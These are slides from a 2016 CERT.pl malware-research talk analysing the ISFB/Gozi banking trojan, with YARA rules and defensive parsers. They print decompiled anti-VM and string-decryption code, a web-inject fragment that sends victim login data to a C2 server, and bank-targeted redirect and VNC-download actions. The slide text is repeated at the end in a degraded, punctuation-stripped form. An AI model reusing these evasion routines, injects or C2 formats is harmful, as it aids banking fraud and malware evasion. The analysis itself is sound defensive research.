02/12/2016 ISFB https://lokalhost.pl/talks/botconf2016/#1 1/58 ISFB Still Live and Kicking Maciej Kotowicz


ISFB: Still Live and Kicking

Maciej Kotowicz


Intro

$ whois mak

Maciej Kotowicz

- Principal Malware Researcher @ CERT.pl
- DragonSector CTF
- RE / Exploit dev
- Automatization
- Formal methods

@maciekkotowicz

Disclaimer

Based on the proposed plan, the author did some source code analysis and wants to summarize his

Well... Nope! 75% of this came from Reverse Engineering.

ISFB, long story short

- Based on gozi
- same bugs going back to 2007
- Ursnif / Gozi / Gozi2 / Rovnix / Vawtrak
- Casual history with rovnix
- For us, public appearance in 2014
- Now one of the most popular bankers on the market
- Couple of offsprings

ISFB

Ursnif / Gozi / Gozi2 / Rovnix / Vawtrak

C:
    DbgPrint("ISFB_%04x: Installer DLL finished with status %u\n", GetCurrentProcessId(), Status);

ISFB project, Version 2.13.241, module dll.c, $Revision: 265 $

Scale

(n6 sinkhole connections in October - bankers only)

Scale

    > db.config.distinct("key", {"type": "isfb", "exe_type": "worker"})
    [
        "q1a2z3w4s5x6e7d8", "S951DX7IZXHH4Y6P", "OvZz8XVH91INT7ek", "V86iYRDA2FSEqWzL",
        "87694321POIRYTRI", "77694321POIRYTRI", "DB23B3470D0CF889", "A79CE7E04B4C9A6A",
        "byVMLEDZAlowtPY",  "0123456789ABCDEF", "2345D892B97F02A",  "Drbp2YVKMWkmPGtJ",
        "Dfei8OoQ0xhjTyql", "0WADGyh7SUCs1i2V", "PHZ4OVL2QLI0N8WN"
    ]

Scale

kudos to Slavo (SWITCH-CERT)

The Dropper, or where the ancients reside

Welcome to the system

- achieve persistency
- inject worker
- setup IPC
- new: download 2nd stage

Useless strings

One Rule to rule them all

    rule isfb_dropper : banker
    {
        meta:
            author = "mak"
            module = "isfb"
        strings:
            $str0 = "Tape Device" fullword
            $str1 = "ASCIT8" fullword
            $str2 = "IEEE 1394"
            $str3 = ".bss"
            $decode_bss = { 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5? }
        condition:
            $decode_bss and 1 of ($str*)
    }

Anti-VM

C:
    // The shift passed to decode_bss is derived from cursor movement between
    // iterations. decode_bss returns 12 while the .bss checksum does not match,
    // so the loop keeps spinning until the cursor actually moves.
    do
    {
        pci.cbSize = 20;
        GetCursorInfo(&pci);
        ret = decode_bss(pci.ptScreenPos.y - old_y - old_x + pci.ptScreenPos.x);
        old_x = pci.ptScreenPos.x;
        old_y = pci.ptScreenPos.x;   // sic: old_y is saved from the x coordinate
    }
    while ( ret == 12 );

Anti-VM

C:
    // Enumerate PnP devices and search each friendly name for hypervisor products.
    // 0xC is SPDRP_FRIENDLYNAME.
    DeviceInfoData.cbSize = 28;
    if ( SetupDiEnumDeviceInfo(v1, 0, &DeviceInfoData) )
    {
        SetupDiGetDeviceRegistryPropertyA(v1, &DeviceInfoData, 0xCu, &Property, 0, 0, &PropertyBufferSize);
        if ( PropertyBufferSize )
        {
            v2 = (BYTE *)xHeapAlloc(PropertyBufferSize);
            v3 = (CHAR *)v2;
            if ( v2 )
            {
                if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSet, &DeviceInfoData, 0xCu, &Property,
                                                       v2, PropertyBufferSize, &PropertyBufferSize)
                  && (StrStrIA(v3, (LPCSTR)"vbox") || StrStrIA(v3, "qemu")
                      || StrStrIA(v3, "vmware") || StrStrIA(v3, "virtual hd")) )
                    v0 = 1;
                xHeapFree(v3);
            }
        }
    }

String encryption

C:
    // Decompiler output. .bss is XOR-decrypted in place with a key built from the
    // build-date string and the section geometry, then verified against a constant.
    signed int __stdcall decode_bss(int shift)
    {
        // v2 points to the section header of .bss
        if ( !v2 )
            return 2;
        v6 = v2->VirtualAddress;
        if ( !v6 || !v2->SizeOfRawData )
            return 192;
        v7 = v2->SizeOfRawData;
        v8 = *(_DWORD *)"016";
        v9 = v13;
        v10 = (shift & 0x1F) + (*(_DWORD *)"29 2016" ^ *(_DWORD *)"Oct 29 2016" ^ (v7 + v6));
        XorDecryptBuffer(v7, (int)((char *)v13 + v6), v2->SizeOfRawData, v10);
        dword_4064EC = dword_40766E + dword_407662 + dword_407666;
        if ( dword_40766E + dword_407662 + dword_407666 != 0xEE553B4E )   // check if correctly decoded
        {
            // wrong key: re-encrypt and report 12 so the caller retries with a new shift
            XorEncryptBuffer(dword_407662, (IMAGE_DOS_HEADER *)((char *)v9 + v2->VirtualAddress), v2->SizeOfRawData);
            v14 = 12;
        }
        ...
    }

Joined resources, or FJ-structs

C:
    typedef struct {
        DWORD fj_magic;
        DWORD addr;
        DWORD size;
        DWORD crc32_name;
        DWORD flags;        // OR'd with 0x10000 means it is packed with aPLib
    } isfb_fj_elem;

Joined resources, or J1-structs

C:
    typedef struct {
        DWORD j1_magic;
        DWORD flags;        // can be aPLib packed
        DWORD crc32_name;
        DWORD addr;
        DWORD size;
    } isfb_fj_elem;

- 0x4F75CEA7, 0x9e154a0c - CRC_CLIENT32
- 0xD722AFCB, 0x8365B957, 0x8fb1dde1 - CRC_CLIENT_INI
- 0xE1285E64 - CRC_PUBLIC_KEY
- 0x90F8AAB4, 0x41982e1f - CRC_CLIENT64
- 0x7A042A8A - NEW - UNKNOWN
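As an added example (not code from the talk or from CERT.pl's tooling), the following Python parses both joined-resource header layouts shown above and resolves crc32_name against the list on this slide. The field layouts and the CRC table come from the slides; the magic values (FJ_MAGIC, J1_MAGIC) and the sample images are constructed for the example, since the talk names the magic fields without giving their values, and aPLib packing is only flagged, not unpacked.

```python
import struct

# Layouts from the talk: five DWORDs each, but FJ and J1 order the fields differently.
FJ_LAYOUT = ("fj_magic", "addr", "size", "crc32_name", "flags")
J1_LAYOUT = ("j1_magic", "flags", "crc32_name", "addr", "size")
ELEM_SIZE = struct.calcsize("<5I")   # 20 bytes
APLIB_FLAG = 0x10000                 # FJ: OR'd into flags when the blob is aPLib-packed

# The talk names the magic fields but not their values; these two are constructed
# for this example and are passed in explicitly by the caller.
FJ_MAGIC = 0x4A46
J1_MAGIC = 0x314A

# crc32_name -> resource meaning, as listed in the talk (several variants per name)
KNOWN_NAMES = {
    0x4F75CEA7: "CRC_CLIENT32", 0x9E154A0C: "CRC_CLIENT32",
    0xD722AFCB: "CRC_CLIENT_INI", 0x8365B957: "CRC_CLIENT_INI", 0x8FB1DDE1: "CRC_CLIENT_INI",
    0xE1285E64: "CRC_PUBLIC_KEY",
    0x90F8AAB4: "CRC_CLIENT64", 0x41982E1F: "CRC_CLIENT64",
    0x7A042A8A: "NEW - UNKNOWN",
}


def parse_elems(image, magic, layout):
    """Read consecutive 20-byte records that start with `magic`; stop at the first mismatch."""
    elems, off = [], 0
    while off + ELEM_SIZE <= len(image):
        fields = struct.unpack_from("<5I", image, off)
        if fields[0] != magic:
            break
        rec = dict(zip(layout, fields))
        rec["name"] = KNOWN_NAMES.get(rec["crc32_name"], "unknown")
        rec["aplib_packed"] = bool(rec["flags"] & APLIB_FLAG)
        elems.append(rec)
        off += ELEM_SIZE
    return elems


def extract(image, magic, layout):
    """Return (name, aplib_packed, raw_bytes) per record. addr/size are checked
    against the image first so a truncated or hostile header cannot hand back a
    silently shortened blob. aPLib unpacking is left to a dedicated library."""
    out = []
    for rec in parse_elems(image, magic, layout):
        start, end = rec["addr"], rec["addr"] + rec["size"]
        if end > len(image) or start >= end:
            raise ValueError("record %s points outside the image" % rec["name"])
        out.append((rec["name"], rec["aplib_packed"], image[start:end]))
    return out


def build_fj_sample():
    """Constructed image: two FJ records followed by their payloads."""
    hdr = 2 * ELEM_SIZE
    p1 = b"MZ" + b"\x00" * 14           # stands in for the 32-bit client DLL
    p2 = b"[client.ini]"                # stands in for a packed client.ini
    recs = struct.pack("<5I", FJ_MAGIC, hdr, len(p1), 0x4F75CEA7, 0)
    recs += struct.pack("<5I", FJ_MAGIC, hdr + len(p1), len(p2), 0x8365B957, APLIB_FLAG)
    return recs + p1 + p2


def build_j1_sample():
    """Constructed image in J1 order (flags before crc32_name, addr/size last)."""
    hdr = ELEM_SIZE
    key = b"-----BEGIN PUBLIC KEY-----"
    recs = struct.pack("<5I", J1_MAGIC, 0, 0xE1285E64, hdr, len(key))
    return recs + key
```

The same `parse_elems` serves both variants because the record size is identical; only the field order (the `layout` tuple) and the magic differ, which is exactly what the two slides show.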

Static configuration

C:
    typedef struct {
        DWORD off;
        DWORD flags;
        QWORD value;
        QWORD uid;
    } isfb_cfg_elem;

    typedef struct {
        QWORD count;
        isfb_cfg_elem elems[count];   // pseudo-C: `count` elements follow
        char string_table[];
    } isfb_cfg;                       // typedef name not on the slide

Static cfg - fields

- 0x556aed8f - server
- 0xea9ea760 - bootstrap
- 0x656b798a - botnet
- 0x4fa8693e - key
- 0xd0665bf6, 0x75e6145c - domains
- 0xefc574ae - dga_seed
- 0x73177345 - dga_base_url
- 0xec99df2e - dga_tld
- 0xdf351e24 - tor32_dll
- 0x510f22d2 - tor_domains
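An added example, not the talk's code: a parser for the static configuration structure of the previous slide that maps each element's uid to the field names listed here. The struct layout and the uid table are from the slides; the meaning of `flags` is not given there, so the example assumes a single bit (FLAG_STRING) that distinguishes string-table offsets from immediate values, and the sample config built by `build_sample_cfg` is constructed.

```python
import struct

CFG_ELEM_FMT = "<IIQQ"                          # off, flags, value, uid
CFG_ELEM_SIZE = struct.calcsize(CFG_ELEM_FMT)   # 24 bytes
COUNT_FMT = "<Q"

# uid -> field name, from the talk's list of static config fields
FIELD_NAMES = {
    0x556AED8F: "server", 0xEA9EA760: "bootstrap", 0x656B798A: "botnet",
    0x4FA8693E: "key", 0xD0665BF6: "domains", 0x75E6145C: "domains",
    0xEFC574AE: "dga_seed", 0x73177345: "dga_base_url", 0xEC99DF2E: "dga_tld",
    0xDF351E24: "tor32_dll", 0x510F22D2: "tor_domains",
}

# Assumed for this example: bit 0 of flags marks `value` as an offset into
# string_table; otherwise value is an immediate integer. The talk shows the
# struct layout but not the flag semantics.
FLAG_STRING = 0x1


def parse_static_cfg(blob):
    """Return {field_name: value} from a serialized static config.

    Every offset is validated against the blob, so a truncated or hostile
    config raises ValueError instead of yielding partial data."""
    if len(blob) < 8:
        raise ValueError("blob too short for count")
    (count,) = struct.unpack_from(COUNT_FMT, blob, 0)
    table_start = 8 + count * CFG_ELEM_SIZE
    if table_start > len(blob):
        raise ValueError("count=%d exceeds blob length %d" % (count, len(blob)))
    strings = blob[table_start:]
    cfg = {}
    for i in range(count):
        off, flags, value, uid = struct.unpack_from(CFG_ELEM_FMT, blob, 8 + i * CFG_ELEM_SIZE)
        name = FIELD_NAMES.get(uid, "unknown_%08x" % uid)
        if flags & FLAG_STRING:
            if value >= len(strings):
                raise ValueError("%s: string offset %d outside table" % (name, value))
            end = strings.find(b"\x00", value)
            raw = strings[value:] if end == -1 else strings[value:end]
            cfg[name] = raw.decode("latin-1")
        else:
            cfg[name] = value
    return cfg


def build_sample_cfg():
    """Constructed config with three string fields and one integer field."""
    table, offsets = b"", {}
    for s in (b"https://cnc.example.invalid/", b"1000", b".com .net"):
        offsets[s] = len(table)
        table += s + b"\x00"
    elems = [
        (0, FLAG_STRING, offsets[b"https://cnc.example.invalid/"], 0x556AED8F),  # server
        (0, FLAG_STRING, offsets[b"1000"], 0x656B798A),                            # botnet
        (0, 0, 0x1234, 0xEFC574AE),                                                # dga_seed
        (0, FLAG_STRING, offsets[b".com .net"], 0xEC99DF2E),                       # dga_tld
    ]
    blob = struct.pack(COUNT_FMT, len(elems))
    for e in elems:
        blob += struct.pack(CFG_ELEM_FMT, *e)
    return blob + table
```

Unknown uids are kept under an `unknown_<hex>` name rather than dropped, so a new field in a fresh build shows up in the output instead of disappearing.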

Static cfg

Man in the Browser, or where my money goes

Dynamic config

C:
    typedef struct {
        DWORD size;
        BYTE  data[size];           // pseudo-C: `size` bytes follow the length
    } inject_elem;

    typedef struct {
        inject_elem target;         // url glob
        inject_elem action;         // or regex
        inject_elem params[4];      // other params
    } inject_chunk;

    typedef inject_chunk injects_t[];

Web Injects

    // tail of an injected script; the start of the IIFE is not on the slide
    var bn = "US_" + "BOFA_1";
    var bot_id = "ID_" + bn;
    var sa = decode64();
    var req = "send=0&u_bot_id=" + bot_id + "&bn=" + bn + "&page=8&u_login=&u_pass=&log=" + get_me_core;
    sendScriptRequest(sa, req, function statusCall1() {
        var element = document.getElementById("loader");
        element.parentNode.removeChild(element);
    });
    })();

Web Actions

- FILE
- SCREENSHOT
- HIDDEN
- NEWGRAB
- VIDEO
- PROCESS
- POST
- VNC

Web Actions

    ACTION REDIRECT - Target myjs128js -> http51016736dimyjs128_plv3js
    ACTION REDIRECT - Target myjs28js -> http51016736dimyjs28_plv3js
    ACTION REDIRECT - Target ats8gatephp -> http51016736azatsbmidgate128php
    ACTION REDIRECT - Target httpswwwcentrum24pl -> http51016736fkcen1php
    ACTION REDIRECT - Target httpscompanynetmbankpl -> http51016736fkmbiz1php
    ACTION FILE - Target prv
    ACTION VNC - Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
    ACTION VNC - Target httpscompanynetmbankpl | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
    ACTION VNC - Target httpsiri | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
    ACTION VNC - Target httpskiri | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
    ACTION VNC - Target httpsibiznes2 | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
    ACTION VNC - Target httpsplhomebankin | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
    ACTION VNC - Target httpshbfaces | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin

The Bot

Registry Keys

    Software\AppDataLow\Software\Microsoft\[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}

- Install
- Client
- NetCfg
- LastTask
- LastConfig
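An added example (not from the talk) of turning the registry indicators above into a check that runs over a hive export: the key pattern and the value names are the slide's; the hive excerpt, its GUIDs and the `min_hits` threshold are constructed for the example.

```python
import re

# Key pattern from the talk: a GUID-named subkey under AppDataLow\Software\Microsoft
ISFB_KEY_RE = re.compile(
    r"^(?:HKCU\\|HKEY_CURRENT_USER\\)?Software\\AppDataLow\\Software\\Microsoft\\"
    r"[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}$",
    re.IGNORECASE,
)
# Value names the bot keeps under that key, from the talk
ISFB_VALUE_NAMES = {"Install", "Client", "NetCfg", "LastTask", "LastConfig"}


def match_key(path, value_names):
    """Return the set of ISFB value names present under `path`, or None when the
    key name itself does not fit the GUID pattern."""
    if not ISFB_KEY_RE.match(path):
        return None
    return ISFB_VALUE_NAMES & set(value_names)


def find_suspicious_keys(keys, min_hits=2):
    """keys: iterable of (key_path, [value_name, ...]) as produced by a hive export.

    AppDataLow is used legitimately by low-integrity software, so a GUID-named
    key alone is weak evidence; several of the bot's value names together are
    what make the finding worth a look."""
    findings = []
    for path, names in keys:
        hits = match_key(path, names)
        if hits and len(hits) >= min_hits:
            findings.append((path, sorted(hits)))
    return findings


# Constructed hive excerpt: GUIDs and value names are made up for the example
SAMPLE_KEYS = [
    (r"HKCU\Software\AppDataLow\Software\Microsoft\Internet Explorer", ["Foo"]),
    (r"HKCU\Software\AppDataLow\Software\Microsoft\3F2504E0-4F89-11D3-9A0C-0305E82C3301",
     ["Install", "Client", "NetCfg", "LastTask", "LastConfig"]),
    (r"HKCU\Software\AppDataLow\Software\Microsoft\9E107D9D-372B-4F9E-A3A8-5E1C2A0F1B21",
     ["Install"]),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", ["OneDrive"]),
]
```

Feeding it a real export means flattening the hive into (path, value names) pairs first; the check itself stays platform-independent, which is what you want when triaging images offline.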

Other Actions

- GET_CERTS
- GET_COOKIES
- GET_SYSINFO
- LOAD_EXE
- GET_FILES
- SOCKS_START
- GET_KEYLOG
- GET_MAIL
- GET_FTP
- VNC_START
- URL_BLOCK

Calling Home

ET phone home

- Static domains inside configuration files
- DGA based on template and current date
- C&C hidden in TOR network
- P2P network

DGA

PYTHON:
    # excerpt from the talk's DGA reimplementation; LsaRandom (the bot's PRNG),
    # `words` (the word list domains are built from) and the DGA_* limits are
    # defined elsewhere
    rnd = LsaRandom()
    rnd.seed = (((kwargs['seed'] << 16) & 0xffffffff) + kwargs['season'] + kwargs['lsa_seed']) & 0xffffffff
    rnd.seed = (1 << 16) + kwargs['season'] - 0x124676D0   # second seeding variant shown on the slide
    r = []
    for i in range(kwargs['count']):
        suf = kwargs['tld'][(rnd.rnd() >> 1) % len(kwargs['tld'])]   # rnd.choose(kwargs['tld'])
        dom_l = rnd.rnd() % self.DGA_MIN_LEN + self.DGA_MIN_LEN
        wc = 0
        dom = []
        while wc < dom_l:
            d = rnd.choose(words)
            ws = len(d)
            if not rnd.rnd() % 3:
                ws //= 2                       # every third word or so is cut in half
            if wc + ws > self.DGA_MAX_LEN:
                continue
            dom.append(d[:ws])
            wc += ws
        r.append(''.join(dom) + suf)

TOR

P2P

C:
    typedef struct {
        DWORD magic;                // 0x395f2ec1
        DWORD my_secret;
        DWORD his_secret;
        BYTE  cmd0;
        BYTE  cmd1;
        BYTE  data[];
    } isfb_p2p_inner_packet;

    typedef struct {
        BYTE  flags;
        DWORD salt;                 // 4 random higher bytes of keys
        isfb_p2p_inner_packet p;    // encrypted
    } isfb_p2p_packet;

Internet is Hard

URL format

    https://%s?user%5fid=%4u&version%5fid=%lu&passphrase=%s&socks=%lu&version=%lu&crc=%8x

    /tfctq.php?mkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY
    oxsxc=kcxsfx&version=212356&user=aa16a132f1689c4d4b2eb59024d986c3&server=12&id=1000&crc=1dc690f

    cnc.tld/images/8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul/jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2U.jpeg

    /t[RAND].php?[RAND]=data

URL format

PYTHON:
    # Python 2 snippet; decrypt() and SKEY (the campaign key) come from the
    # analyst's toolkit and are not shown on the slide
    decode_req = lambda d: decrypt(d.decode('base64'), SKEY)
    d = re.sub(r'_([0-9A-Fa-f]{2})', lambda x: chr(int(x.group(1), 16)), d)   # _2B -> '+', _2F -> '/'
    try:
        e = d.decode('base64')
    except Exception as e:
        d = d + '=='                                                            # restore stripped padding
    pprint.pprint(dict(map(lambda x: x.split('='), decode_req(d).strip('\x00').split('&'))))

    {'crc': '7001380',
     'id': '1065',
     'ppc': 'xi',
     'server': '12',
     'soft': '1',
     'user': '0c0d784a0cf755970edbdf4c0cb27fca',
     'version': '214887'}

URL format

    t*.php        | get new task            | Used until Sep 2015
    c*.php        | get new config          | Used until Sep 2015
    d*.php        | send stolen data        | Used until Sep 2015
    images/*.gif  | get new task            | current format
    images/*.jpeg | get new config          | current format
    images/*.bmp  | send stolen data        | current format
    images/*.avi  | download 2nd stage dll  | not every C&C
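An added example, not the talk's tooling, that puts the request-type table above and the decoding steps of the previous slide (un-escape `_XX`, re-pad, base64-decode, decrypt, split on `&`) into one runnable Python module. The URL patterns and the `_2B`/`_2F` escaping are from the slides; the token extraction that re-joins path segments, the `decrypt` callback (identity here, Serpent with the campaign key against real traffic) and the sample URL produced by `build_sample_url` are assumptions made for the example.

```python
import base64
import re
from urllib.parse import urlsplit

# Request types from the talk's table: the old *.php scheme and the current /images/ scheme
REQUEST_TYPES = [
    (re.compile(r"^/t[^/]*\.php$"), "get new task", "used until Sep 2015"),
    (re.compile(r"^/c[^/]*\.php$"), "get new config", "used until Sep 2015"),
    (re.compile(r"^/d[^/]*\.php$"), "send stolen data", "used until Sep 2015"),
    (re.compile(r"^/images/.+\.gif$"), "get new task", "current format"),
    (re.compile(r"^/images/.+\.jpeg$"), "get new config", "current format"),
    (re.compile(r"^/images/.+\.bmp$"), "send stolen data", "current format"),
    (re.compile(r"^/images/.+\.avi$"), "download 2nd stage dll", "not every C&C"),
]


def classify(url):
    """Map a beacon URL to (purpose, era) per the talk's table; None if no pattern fits."""
    path = urlsplit(url).path
    for rx, purpose, era in REQUEST_TYPES:
        if rx.match(path):
            return purpose, era
    return None


def extract_token(url):
    """Pull the encoded blob out of either scheme (assumption made for this example).
    The current scheme spreads the blob over path segments; they are re-joined here,
    which is safe because the bot escapes base64's own '/' as _2F, so a literal '/'
    is always a separator."""
    parts = urlsplit(url)
    if parts.path.startswith("/images/"):
        inner = parts.path[len("/images/"):].rsplit(".", 1)[0]   # drop the fake extension
        return inner.replace("/", "")
    first = parts.query.split("&", 1)[0]                          # old scheme: first query value
    return first.partition("=")[2]


def unescape_token(token):
    """_XX -> byte XX, restoring the '+' and '/' the bot rewrote as _2B and _2F."""
    return re.sub(r"_([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), token)


def decode_request(token, decrypt=lambda raw: raw):
    """Un-escape, re-pad, base64-decode, decrypt and split a token into a dict.
    Against real traffic `decrypt` must be Serpent decryption with the campaign key;
    the identity default keeps the example runnable offline."""
    t = unescape_token(token)
    t += "=" * (-len(t) % 4)                                      # the bot strips base64 padding
    plain = decrypt(base64.b64decode(t)).rstrip(b"\x00")
    fields = {}
    for kv in plain.decode("latin-1").split("&"):
        if kv:
            key, _, value = kv.partition("=")
            fields[key] = value
    return fields


def build_sample_url(fields, encrypt=lambda raw: raw):
    """Constructed inverse of decode_request, only to produce test input for the example."""
    plain = "&".join("%s=%s" % kv for kv in fields).encode("latin-1")
    b64 = base64.b64encode(encrypt(plain)).decode("ascii").rstrip("=")
    b64 = b64.replace("+", "_2B").replace("/", "_2F")
    return "http://cnc.example.invalid/images/%s/%s.jpeg" % (b64[:40], b64[40:])
```

Splitting the plaintext by hand instead of `urllib.parse.parse_qsl` is deliberate: `parse_qsl` would turn a literal `+` into a space and apply percent-decoding, neither of which the bot's format uses.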

C&C response

Wiki

Serpent is a symmetric key block cipher that was a finalist in the Advanced Encryption Standard (AES) contest, where it was ranked second to Rijndael. Serpent was designed by Ross Anderson, Eli Biham, and Lars Knudsen.

Like other AES submissions, Serpent has a block size of 128 bits and supports a key size of 128, 192 or 256 bits.[2] The cipher is a 32-round substitution-permutation network operating on a block of four 32-bit words. Each round applies one of eight 4-bit to 4-bit S-boxes 32 times in parallel. Serpent was designed so that all operations can be executed in parallel, using 32 bit slices. This maximizes parallelism, but also allows use of the extensive cryptanalysis work performed on DES.

C&C response

Command and Control

IAP

    rewrite ^/fileto/(.*)\.(bin)  /get128.php?x=$1    break;
    rewrite ^/images/(.*)\.(bmp)  /data.php?x=$1$2    break;
    rewrite ^/images/(.*)\.(avi)  /loader.php?x=$1$2  break;
    rewrite ^/images/(.*)\.(gif)  /task.php?x=$1$2    break;
    rewrite ^/images/(.*)\.(jpeg) /config.php?x=$1$2  break;

IAP

Dreambot

    RewriteEngine on
    RewriteRule ^c(.+)\.php$ new_chandler.php [L,QSA]
    RewriteRule ^t(.+)\.php$ new_thandler.php [L,QSA]
    RewriteRule ^d(.+)\.php$ new_dhandler.php [L,QSA]
    RewriteRule ^images/(.*)\.(bmp)  new_dhandler.php?q=$1$2 [L,QSA]
    RewriteRule ^images/(.*)\.(gif)  new_thandler.php?q=$1$2 [L,QSA]
    RewriteRule ^images/(.*)\.(jpeg) new_chandler.php?q=$1$2 [L,QSA]

Dreambot

Dreambot

    rule isfb_dreambot : ban<br>ker
    {
        meta:
            author = "mak"
            module = "isfb"
        strings:
            $str0 = "vmware" fullword
            $str1 = "vbox" fullword
            $str2 = "virtual hd" fullword
            $str4 = "qemu" fullword
            $str3 = "c321.txt" fullword
        condition:
            all of them and isfb_dropper
    }

The End, or not

Offsprings and Cousins

Payloads:

- Nymain
- Powersniff / PunchyBagg

Common Roots:

- Bolek/KBOT - based on gozi
- Rovnix - ISFB was ring3 payload protected by rovnix
- Vawtrak - Nothing in common

Recap

- One of the oldest bankers under active development
- Interesting solutions
- Various methods of infection
- Elaborate communication methods: DGA / P2P / TOR
- Old bugs die hard ;]
- Read paper for more details ;]
- Code soon available at mak's github, random-stuff/isfb

Kudos: people that knowingly (or not) helped us

- Slavo
- Paul Black
- Kafeine
- Peter Kruse
- Piotr Kijewski
- Jarosław Jedynak
- Horgh
- Frank Ruiz

Q & A

info@cert.pl / www.cert.pl

CERTPolska / @CERTPolska

CERTPolska / @CERTPolska_en

mak / mak@cert.pl

Page 2: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 258

Intro

02122016 ISFB

httpslokalhostpltalksbotconf20161 358

$ whois makMaciej Kotowicz

Principal Malware Researcher CERTplDragonSector CTFREExploit devAutomatization Formal methodsmaciekkotowicz

middotmiddotmiddotmiddotmiddot

358

02122016 ISFB

httpslokalhostpltalksbotconf20161 458

Disclaimer

Based on proposed plan author did some source codeanalysis and want to summarize his

Well Nope 75 of this came from Reverse Engineering

458

ISFB long story short

02122016 ISFB

httpslokalhostpltalksbotconf20161 558

ISFB long story short

Based on gozisame bugs going back to 2007UrsnifGoziGozi2RovnixVawtrakCasual history with rovnixFor us public appearence in 2014Now one of most puplar bankers on marketCouple of offsprings

middotmiddotmiddotmiddotmiddotmiddotmiddot

558

02122016 ISFB

httpslokalhostpltalksbotconf20161 658

ISFB

UrsnifGoziGozi2RovnixVawtrak

DbgPrint(ISFB_04x Installer DLL finished with status un GetCurrentProcessId() Status)C

ISFB project Version 213241 module dllc $Revision 265 $

658

02122016 ISFB

httpslokalhostpltalksbotconf20161 758

Scale

(n6 sinkhole connections in october - bankers only)

758

02122016 ISFB

httpslokalhostpltalksbotconf20161 858

Scale gt dbconfigdistinct(keytypeisfbexe_typeworker) [ q1a2z3w4s5x6e7d8 S951DX7IZXHH4Y6P OvZz8XVH91INT7ek V86iYRDA2FSEqWzL 87694321POIRYTRI 77694321POIRYTRI DB23B3470D0CF889 A79CE7E04B4C9A6A byVMLEDZAlowtPY 0123456789ABCDEF 2345D892B97F02A Drbp2YVKMWkmPGtJ Dfei8OoQ0xhjTyql 0WADGyh7SUCs1i2V PHZ4OVL2QLI0N8WN ]

858

02122016 ISFB

httpslokalhostpltalksbotconf20161 958

Scale

958

Scale

02122016 ISFB

httpslokalhostpltalksbotconf20161 1058

Scalekudos to Slavo (SWITCH-CERT)

1058

02122016 ISFB

httpslokalhostpltalksbotconf20161 1158

The Dropperor where the acients reside

02122016 ISFB

httpslokalhostpltalksbotconf20161 1258

Welcome to the system

achieve persistencyinject workersetup IPCnew download 2nd stage

middotmiddotmiddotmiddot

1258

02122016 ISFB

httpslokalhostpltalksbotconf20161 1358

Useless strings

1358

02122016 ISFB

httpslokalhostpltalksbotconf20161 1458

One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)

1458

02122016 ISFB

httpslokalhostpltalksbotconf20161 1558

Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)

C

1558

Anti-VM

02122016 ISFB

httpslokalhostpltalksbotconf20161 1658

Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)

C

1658

02122016 ISFB

httpslokalhostpltalksbotconf20161 1758

String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12

C

1758

02122016 ISFB

httpslokalhostpltalksbotconf20161 1858

Joined resourcesor FJ-structs

typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem

C

1858

02122016 ISFB

httpslokalhostpltalksbotconf20161 1958

Joined resourcesor J1-structs

typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem

C

